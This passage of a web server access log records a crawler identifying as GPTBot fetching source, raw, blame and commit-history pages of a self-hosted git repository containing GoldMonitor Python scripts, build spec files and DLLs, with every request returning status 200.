200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 21347] [Gzip 7.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 12596] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" +[17/Feb/2026:14:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:14:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:14:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:14:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 2179834] [Gzip 21.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9867] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 11748] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 9868] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 11719] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:14:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:14:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:14:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:14:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 10414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:14:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 20465] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:14:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 312512] [Gzip 21.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:14:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 19857] [Gzip 6.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 20871] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 12355] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 18553] [Gzip 5.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:14:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18000] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 12326] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 12354] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 19068] [Gzip 9.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:14:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:14:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 21346] [Gzip 7.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 9869] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:14:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:14:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 11485] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:14:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:14:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:14:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:14:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 11454] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:14:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 11485] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:14:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:14:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 9861] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:14:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:14:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 6692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:14:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 12402] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 22905] [Gzip 11.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:14:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 20788] [Gzip 6.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10969] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9577] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:14:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 12400] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 12597] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:14:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr 